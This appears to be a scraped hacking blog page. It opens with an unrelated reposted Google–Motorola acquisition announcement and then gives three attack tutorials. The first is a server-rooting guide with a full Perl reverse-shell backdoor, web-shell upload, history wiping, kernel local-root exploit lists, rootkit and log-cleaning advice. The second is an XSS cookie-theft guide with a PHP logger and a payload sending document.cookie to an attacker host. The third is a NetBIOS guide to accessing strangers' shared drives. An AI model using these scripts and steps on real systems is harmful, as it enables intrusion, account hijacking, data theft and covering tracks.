Interesting news came out a few days ago, Google to acquire Motorola Mobility for the increasing happened in the past years from 90 million to 150 million Android devices.

8/15/2011 04:35:00 AM

Since its launch in November 2007, Android has not only dramatically increased consumer choice but also improved the entire mobile experience for users. Today, more than 150 million Android devices have been activated worldwide—with over 550,000 devices now lit up every day—through a network of about 39 manufacturers and 231 carriers in 123 countries. Given Android’s phenomenal success, we are always looking for new ways to supercharge the Android ecosystem. That is why I am so excited today to announce that we have agreed to acquire Motorola.

Motorola has a history of over 80 years of innovation in communications technology and products, and in the development of intellectual property, which have helped drive the remarkable revolution in mobile computing we are all enjoying today. Its many industry milestones include the introduction of the world’s first portable cell phone nearly 30 years ago, and the StarTAC—the smallest and lightest phone on earth at time of launch. In 2007, Motorola was a founding member of the Open Handset Alliance that worked to make Android the first truly open and comprehensive platform for mobile devices. I have loved my Motorola phones from the StarTAC era up to the current DROIDs.

In 2008, Motorola bet big on Android as the sole operating system across all of its smartphone devices. It was a smart bet and we’re thrilled at the success they’ve achieved so far. We believe that their mobile business is on an upward trajectory and poised for explosive growth.

Motorola is also a market leader in the home devices and video solutions business. With the transition to Internet Protocol, we are excited to work together with Motorola and the industry to support our partners and cooperate with them to accelerate innovation in this space.

Motorola’s total commitment to Android in mobile devices is one of many reasons that there is a natural fit between our two companies. Together, we will create amazing user experiences that supercharge the entire Android ecosystem for the benefit of consumers, partners and developers everywhere.

This acquisition will not change our commitment to run Android as an open platform. Motorola will remain a licensee of Android and Android will remain open. We will run Motorola as a separate business. Many hardware partners have contributed to Android’s success and we look forward to continuing to work with all of them to deliver outstanding user experiences.

We recently explained how companies including Microsoft and Apple are banding together in anti-competitive patent attacks on Android. The U.S. Department of Justice had to intervene in the results of one recent patent auction to “protect competition and innovation in the open source software community” and it is currently looking into the results of the Nortel auction. Our acquisition of Motorola will increase competition by strengthening Google’s patent portfolio, which will enable us to better protect Android from anti-competitive threats from Microsoft, Apple and other companies.

The combination of Google and Motorola will not only supercharge Android, but will also enhance competition and offer consumers accelerating innovation, greater choice, and wonderful user experiences. I am confident that these great experiences will create huge value for shareholders.

I look forward to welcoming Motorolans to our family of Googlers.

Today, I have decided to put up a tutorial for both newbies and pawners! And just reference for all of us. This is a dream of every hacker, to get free root access. If you haven't got one, then try harder, because you are not a hacker then.

Hacking is not about dumping database using prescripted materials by another hacker, a good hacker does write his own script and use it to the maximum extent to achieve whatever his/her project was, and this is refers to as private script.

You have to get access to restricted access before you can say, I'm a h4xor or so!
Today, I will give you brief tutorial on how to get your first root access!
Ok enough.

Requirement :
  • Shell
  1. http://unsecure-site.com/r57.php
  2. http://unsecured-site.com/c99.php
This mean you have downloaded shell on the site.

You will need, swiss-army weapon (Don't travel to swiss yet, this is netcat) and it can be downloaded on internet free of charge

You will also need a backconnect script. I provided one for your use here!
So let's roll on.

Shell Access on a website is the first thing you will need.

You can get this access, by doing uploading of shell to any vulnerable website using the following method :
LFI = Local File Inclusion
RFI = Remote File Inclusion
SQL Injection

I will not go to details on the above. I will post extensive tutorial on those later, but I think the forum must have some nice tutorial on those, do some search.
NOW, get swiss knife weapon, AKA netcat
  • http://www.vulnwatch.org/netcat/nc111nt.zip
If you have an antivirus that auto deletes infected files or virus i would suggest disabling it as some av's will detect netcat as a hacktool or remote admin tool.
It is not a virus.

Downloaded? Good on window box, double click it and it will bring up a command prompt, then type
-vv -l -n -p
Now backconnect, I prefer to use one thats not in the shell because i find that those back connects work shitty so i will provide you with one that i use. Very simple to use just save as "bc.pl" then upload to server and end execute.
Code:
perl bc.pl
Code: PERL

#!/usr/bin/perl
use IO::Socket;
# Priv8 ** Priv8 ** Priv8
# x33x@v!3r Connect Back Shell
# code by : x33x@v!3r
# We Are : x33x@v!3r-h3x4-cr3w\x90
# Email:s4t3ll1t3@ihsteam.com
#
#x33x@v!3r@SlackwareLinux:/home/programing$ perl dc.pl
#--== ConnectBack Backdoor Shell vs 1.0 by x33x@v!3r ==--
#
#Usage: dc.pl [Host] [Port]
#
#Ex: dc.pl 127.0.0.1 2121
#x33x@v!3r@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121
#--== ConnectBack Backdoor Shell vs 1.0 by x33x@v!3r ==--
#
#[*] Resolving HostName
#[*] Connecting... 127.0.0.1
#[*] Spawning Shell
#[*] Connected to remote host

#bash-2.05b# nc -vv -l -p 2121
#listening on [any] 2121 ...
#connect to [127.0.0.1] from localhost [127.0.0.1] 32769
#--== ConnectBack Backdoor vs 1.0 by s4t3ll1t3 of s4t3ll1t3 SABOTAGE ==--
#
#--==Systeminfo==--
#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown
GNU/Linux
#
#--==Userinfo==--
#uid=1001(lamer) gid=100(users) groups=100(users)
#
#--==Directory==--
#/root
#
#--==Shell==--
#
$system = '/bin/bash';
$ARGC=@ARGV;
print "IHS BACK-CONNECT BACKDOOR\n\n";
if ($ARGC!=2) {
print "Usage: $0 [Host] [Port] \n\n";
die "Ex: $0 127.0.0.1 2121 \n";
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to
Resolve Host\n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to
Connect Host\n";
print "[*] Resolving HostName\n";
print "[*] Connecting... $ARGV[0] \n";
print "[*] Spawning Shell \n";
print "[*] Connected to remote host \n";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
print "IHS BACK-CONNECT BACKDOOR \n\n";
system("unset HISTFILE; unset SAVEHIST;echo --==Systeminfo==--; uname -a;echo;
echo --==Userinfo==--; id;echo;echo --==Directory==--; pwd;echo; echo --==Shell==-- ");
system($system);
#EOF
Copy the above to a file and name it bc.pl upload it to server, you are done.

** Note that if you are running a router or wireless on multiple ips set by your dhcp you might have to forward the to what ever the ip of your computer is. You can check this by opening command prompt and typing ipconfig you should get an ip that looks similar to 192.168.1.100 which is the ip to forward to. If you are unsure about. How to forward your port check out this site and find your router model.
  • http://portforward.com/routers.htm
Now back to netcat, type the following command.
-vv -l -n -p 443
For this tutorial, we will connect on port 4343. Hit enter and it should start listening for a connection.

Remember you had downloaded bc.pl. on the server, now connect it to you netcat with the following command
perl bc.pl 443
Check your netcat, it should be connected
giving you details info about the box.

I like to do this first to know the kinda exploit u will use.
uname -a;id
Once executed you will see something probably similar to
Code:
Linux alexandra.adm24.de 2.6.8-2-686-smp #1 SMP Tue Aug 16 12:08:30 UTC 2005 i686
GNU/Linux
uid=33(www-data) gid=33(www-data) groups=33(www-data)
The important information here that you want is the OS & Kernel version which is 2.6.8-2 and you can see the last update of it was in 2005 so it's fairly old. Which is a good thing for us.

Below here are kernel that can be rooted, just general ideal. I have a link to the kernels and their exploit, check it out.
http://www.molotovbitch.org/localroot/

Code:
2.2 -> ptrace
2.4.17 -> newlocal, kmod, uselib24
2.4.18 -> brk, brk2, newlocal, kmod
2.4.19 -> brk, brk2, newlocal, kmod
2.4.20 -> ptrace, kmod, ptrace-kmod, brk, brk2
2.4.21 -> brk, brk2, ptrace, ptrace-kmod
2.4.22 -> brk, brk2, ptrace, ptrace-kmod
2.4.22-10 -> loginx
2.4.23 -> mremap_pte
2.4.24 -> mremap_pte, uselib24
2.4.25-1 -> uselib24
2.4.27 -> uselib24
2.6.2 -> mremap_pte, krad, h00lyshit
2.6.5 -> krad, krad2, h00lyshit
2.6.6 -> krad, krad2, h00lyshit
2.6.7 -> krad, krad2, h00lyshit
2.6.8 -> krad, krad2, h00lyshit
2.6.8-5 -> krad2, h00lyshit
2.6.9 -> krad, krad2, h00lyshit
2.6.9-34 -> r00t, h00lyshit
2.6.10 -> krad, krad2, h00lyshit
2.6.13 -> raptor, raptor2, h0llyshit, prctl
2.6.14 -> raptor, raptor2, h0llyshit, prctl
2.6.15 -> raptor, raptor2, h0llyshit, prctl
2.6.16 -> raptor, raptor2, h0llyshit, prctl
2.6.23 - 2.6.24 -> diane_lane_******_hard.c
2.6.17 - 2.6.24-1 -> jessica_biel_naked_in_my_bed.c
You can get it there update version on this site.
  • http://www.molotovbitch.org/localroot/

Once you have found the Kernel ver. of the server you are about to root you need to find
the Local Root Exploit for that kernel which you can find with google using the list
above. or just go here to make it easier!

http://www.molotovbitch.org/localroot/

Now check which exploit goes for which kernel, ok? you found it. good, before doing anything on this server, be as smart as possible, type this command

unset HISTFILE ; unset HISTSIZE ; export HISTFILESIZE=0 ;
this simply try to help your ass to to be traced by the histroy of your commands

Now comply and root.

To Compile your scripts go to
your shell that you have spawned with netcat and follow this instructions.

Code:
gcc xpl.c -o xpl
This will compile your xpl.c to a file named xpl.

From here now all you have to do is run your exploit which can be done by simply typing
in your netcat connection

Code:
./xpl

It should execute the exploit file which you have just compiled and give you root

then type
id; whoami

it should say, root, your are root

Congratulations! then remember me in your dream for posting this for your use.

remember, all exploits are not just compile and execute, some requires some little works eg h0llyshit. it require a big file to work.

example of h00lyshit here

before the compile)
For the h00lyshit we must type:
gcc h00lyshit.c -o h00lyshit
then you get h00lyshit.
The command to run this exploit is:
./h00lyshit
We need a very big file on the disk in order to run successfully and to get root.
We must create a big file in /tmp or into another writable folder.
The command is:
dd if=/dev/urandom of=largefile count=2M
where largefile is the filename.
please wait 2-3 minutes to get the file created!
If this command fails we can try:
dd if=/dev/zero of=/tmp/largefile count=102400 bs=1024
Now we can procced to the last step. We can run the exploit by typing:
./h00lyshit largefile or
./h00lyshit /tmp/largefile
(If we are in a different writable folder and the largefile is created in /tmp)
If there are not running errors (maybe the kernel is patched or is something wrong with
exploit run or large file) we will get root
To check if we got root:
id or
whoami
If it says root we got root!
Now we can deface/mass deface all the sites of the server or to setup a rootkit (e.g.
SSHDoor) and to take ssh/telnet shell access to the server.
We must erase all logs in order to be safe with a log cleaner. A good cleaner for this
job is the MIG Log Cleaner. clean your tracks, never leave them uncleaned!


This tutorial is written by me, siteprojects
for more hands on training you can join me on my irc at irc.unixreal.net #siteprojects

I have provided some server for training.. so dont worry.

written by siteprojects and credit should be given to those who deserve it.

You have permission to post in another forum like always, but do not forget to give credit.
like I say, join irc.unixreal.net #siteprojects on details on how to get box rooted, LFI RFI SQL etc.

N jooooooooooooooy

----------------------------------------------------

join www.masterc0de.com and irc.madunix.net #s4t3ll1t3 join now for instant help, hack sites, bots, validate, scan, inject, dump data

credits:
- siteprojects
- darkc0de.com


This is a tutorial video about how to steal cookie using Cross Site Scripting (XSS) trick. Once you got victim's cookie, you can login using his/her account even without knowing his/her password. If you have critiques, suggestions, questions, just drop your comments here :)

Things you will use :
  1. Notepad
  2. Google
  3. Mozilla 3.0 or higher
  4. Mozilla Addons - Firebug 1.4.5
  5. Mozilla Addons - Firecookie 1.0b4 (extension for Firebug)
  6. Web hosting (use free hosting such as www.0fees.net)
  7. Target website

Scenario :
  1. www.abcde.co.id is a website vulnerable to Cross Site Scripting (XSS) attack.
  2. When its member logined, system will create a cookie to keep him logined.
  3. Its member can post something, including html/ java script code in the textbox, even other non-logined users can see that text.
  4. So, an attacker puts a link in the textbox to trap other members.
  5. That link actually will execute a cookie stealing script that attacker has uploaded into a web hosting before.
  6. If another members see and click the link, his/her cookie will be logged/recorded in the text file located in the attacker's web hosting.
  7. Then, the attacker opens the text file, get the cookie name and values.
  8. Using Firebug and Firecookie add-ons in Mozilla, the attacker can copy that cookie into browser and login to www.abcde.co.id using target's account, even without knowing his/her target's password.
Now, here's the tutorial :
  • Open notepad and copy paste this code below.
<?php
$cookie = $HTTP_GET_VARS["cookie"];
$date = date ("I ds of F Y h:i:s A");
$user_agent = $_SERVER['HTTP_USER_AGENT']
$file = fopen ('log.txt', 'a');
fwrite($file,"DATE : $date || USER AGENT : $user_agent || COOKIE : $cookie \n")
fclose($file);

echo '<br>Sorry, this page is under construction</br></br></br>Please click <a href="http://www.anywebsiteyouwanttorefer.com">here</a> to go back to previous page.

?>
  • Then, you save it as "something.php"
  • Create new notepad, leave it empty and save it as "log.txt"
  • Now, you go to your web hosting (if you don't have one, you can register at www.0fees.net for free)
  • Upload the files that you created before "something.php" and "log.txt" into htdocs (other web hosting may different ) ** DONT FORGET TO WRITE DOWN THE URL OF SOMETHING.PHP **
  • Change the permission of files to 777 using chmod.
  • Now, go to the www.abcde.co.id (target website) and using you or your friend's account, injected a html and java script code into the textbox.
Copy and paste the code below into the textbox :

<a onclick="document.location='http://www.yourweb.0fees.net/something.php?cookie='+escape(document.cookie);" href="#">Click Here For Details.</a>

Wait for victim... supposed someone will login into website.
  • And if the luck is on the attacker when the victim see the link and clicked it. It will go direct to the page that said "The page is under construction" as it written in something.php. Then, the victim click on the back link, everything back to normal page while the attacker making victim not to think any suspicious on the page before.
  • Now, the attacker can open the log.txt and get the victim's cookie and values.
  • Once you get the cookie, convert the encoded to ascii. (www.centricle.com - ascii convertor)
  • The attacker will find out username's victim.
  • The attacker will clear all cookie in mozilla. open firebug add-ons to create and edit cookie.
There's still more, i will update it later... need sleep now..!

What the hell is XSS?! All of you still wondering ?


XSS may refer to Cross-site Scripting, is a vulnerability in web applications, using this attacker can steal users' information such as Card Credit, Bank Account information, Paypal Account and other personal information. All the personal credentials may be stolen through any kind of exploitation. Cookies and phishing page or login also can be use in exploitations.


Stay tuned.


THIS NETBIOS HACKING GUIDE WILL TELL YOU ABOUT HACKING REMOTE COMPUTER AND GAINING ACCESS TO IT’S HARD-DISK OR PRINTER. NETBIOS HACK IS THE EASIEST WAY TO BREAK INTO A REMOTE COMPUTER.


STEP-BY-STEP NETBIOS HACKING PROCEDURE
  1. Open command prompt
  2. In the command prompt use the “net view” command
  3. ( OR YOU CAN ALSO USE “NB Scanner” OPTION IN “IP TOOLS” SOFTWARE BY ENTERING RANGE OF IP ADDRESSS. BY THIS METHOD YOU CAN SCAN NUMBER OF COMPUTERS AT A TIME).
    Example :
    C:\>net view \\219.64.55.112
    The above is an example for operation using command prompt. “net view” is one of the netbios command to view the shared resources of the remote computer. Here “219.64.55.112″ is an IP address of remote computer that is to be hacked through Netbios. You have to substitute a vlaid IP address in it’s place. If succeeded a list of HARD-DISK DRIVES & PRINTERS are shown. If not an error message is displayed. So repeat the procedure 2 with a different IP address.
  4. After succeeding, use the “net use” command in the command prompt. The “net use” is another netbios command which makes it possible to hack remote drives or printers.
  5. Example-1 :
    C:\>net use D: \\219.64.55.112\F
    Example-2 :
    C:\>net use G: \\219.64.55.112\SharedDocs
    Example-3 :
    C:\>net use I: \\219.64.55.112\Myprint
    NOTE : In Examples 1,2 & 3, D:,G: & I: are the Network Drive Names that are to be created on your computer to access remote computer’s hard-disk.
    NOTE : GIVE DRIVE NAMES THAT ARE NOT USED BY ANY OTHER DRIVES INCLUDING HARD-DISK DRIVES, FLOPPY DRIVES AND ROM-DRIVES ON YOUR COMPUTER. THAT IS, IF YOU HAVE C: & D: AS HARD DIRVES, A: AS FLOPPY DIVE AND E: AS CD-DRIVE, GIVE F: AS YOUR SHARED DRIVE IN THE COMMAND PROMPT
    F:,”SharedDocs” are the names of remote computer’s hard-disk’s drives that you want to hack. “Myprint” is the name of remote computer’s printer. These are displayed after giving “net use” command. “219.64.55.112″ is the IP address of remote computer that you want to hack.
  6. After succeeding your computer will give a message that “The command completed successfully“. Once you get the above message you are only one step away from hacking the computer.
Now open “My Computer” you will see a new “Hard-Disk drive”(Shared) with the specified name. You can open it and access remote computer’s Hard-Drive. You can copy files, music, folders etc. from victim’s hard-drive. You can delete/modify data on victim’s hard-drive only if WRITE-ACCESS is enabled on victim’s system. You can access files/folders quickly through “Command Prompt”.
NOTE : If Remote Computer’s Firewall Is Enabled Your Computer Will Not Succeed In Gaining Access To Remote Computer Through Netbios. That is Netbios Hacking Is Not Possible In This Situation.(An Error Message Is Displayed). So Repeat The Procedure 2,3 With Different IP Address.
HAPPY NETBOS HACKING!!

Related Posts Plugin for WordPress, Blogger...
© Copyright XAND™ | Hacking For Education 2010 - 2011. Powered by Blogger.

Networked Blog

Follow Me